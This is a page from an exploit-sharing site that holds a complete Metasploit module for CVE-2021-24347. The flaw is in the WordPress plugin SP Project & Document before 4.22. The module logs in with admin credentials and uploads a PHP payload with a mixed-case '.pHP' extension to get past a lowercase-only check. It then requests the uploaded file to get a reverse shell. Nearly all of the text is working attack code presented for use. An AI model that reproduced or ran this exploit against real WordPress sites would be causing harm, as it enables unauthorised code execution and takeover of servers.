0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress SP Project And Document Remote Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
'Description' => %q{
This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ron Jost', # Exploit-db
'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
],
'References' =>
[
['EDB', '50115'],
['CVE', '2021-24347']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Wordpress SP Project & Document < 4.22', {}]
],
'Privileged' => false,
'DisclosureDate' => '2021-06-14',
'Notes' =>
{
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options [
OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
]
end
def check
return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
if cookie
check_plugin_version_from_readme('sp-client-document-manager', '4.22')
else
CheckCode::Detected('The admin credentials given are wrong !')
end
end
def get_user_id(cookie)
r = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
'Referer' => full_uri('/wp-admin/users.php'),
'vars_get' => {
'page' => 'sp-client-document-manager-fileview'
}
})
fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless user_id && user_id[1]
user_id[1]
end
def exploit
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
user_id = get_user_id(cookie)
payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
post_data = Rex::MIME::Message.new
post_data.add_part(Rex::Text.rand_text_alpha(5..8), nil, nil, "form-data; name='cdm_upload_file_field'")
post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")
print_status("Uploading file \'#{payload_name}\' containing the payload...")
r = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
'headers' => {
'Origin' => full_uri(''),
'Referer' => full_uri('wp-admin/admin.php')
},
'vars_get' => {
'page' => 'sp-client-document-manager-fileview',
'id' => user_id
},
'cookie' => cookie,
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
)
fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302
register_files_for_cleanup(payload_name.downcase)
print_status('Triggering the payload ...')
send_request_cgi(
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
)
end
end
# 0day.today [2024-11-16] #